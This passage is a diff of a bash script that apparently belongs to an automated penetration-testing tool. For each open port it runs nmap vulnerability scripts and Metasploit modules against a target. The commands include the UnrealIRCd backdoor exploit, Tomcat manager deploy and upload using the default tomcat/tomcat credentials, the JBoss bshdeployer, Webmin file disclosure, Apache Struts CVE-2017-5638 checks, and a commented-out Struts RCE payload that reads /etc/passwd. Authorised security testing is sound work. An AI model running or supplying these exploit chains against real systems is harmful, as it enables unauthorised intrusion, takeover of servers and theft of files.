else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_5984" ];
@@ -1227,7 +1354,7 @@ then
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
nmap -A -sV -Pn -T5 --script=couchdb* -p 5984 $TARGET
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
fi
@@ -1236,7 +1363,8 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -Pn -T5 --script=x11* -p 6000 $TARGET
msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
fi
if [ -z "$port_6667" ];
@@ -1244,7 +1372,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -Pn -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1261,6 +1389,7 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
fi
if [ -z "$port_8100" ];
@@ -1279,6 +1408,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
fi
if [ -z "$port_8080" ];
@@ -1297,8 +1427,8 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
fi
@@ -1320,7 +1450,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1343,7 +1473,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_8888" ];
@@ -1358,6 +1488,7 @@ else
xsstracer $TARGET 8888
nikto -h http://$TARGET:8888
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
fi
if [ -z "$port_10000" ];
@@ -1370,12 +1501,21 @@ else
msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
if [ -z "$port_16992" ];
then
echo -e "$OKRED + -- --=[Port 16992 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
amap $TARGET 16992 -A
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
fi
if [ -z "$port_27017" ];
then
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
nmap -p 27017 -T5 --script=mongodb* $TARGET
nmap -sV -p 27017 -Pn -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27018" ];
@@ -1383,7 +1523,7 @@ then
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
nmap -p 27018 -T5 --script=mongodb* $TARGET
nmap -sV -p 27018 -Pn -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27019" ];
@@ -1391,7 +1531,7 @@ then
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
nmap -p 27019 -T5 --script=mongodb* $TARGET
nmap -sV -p 27019 -Pn -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_28017" ];
@@ -1399,7 +1539,7 @@ then
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
nmap -p 28017 -T5 --script=mongodb* $TARGET
nmap -sV -p 28017 -Pn -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_49152" ];
@@ -1419,7 +1559,9 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -Pn -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +$RESET"
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then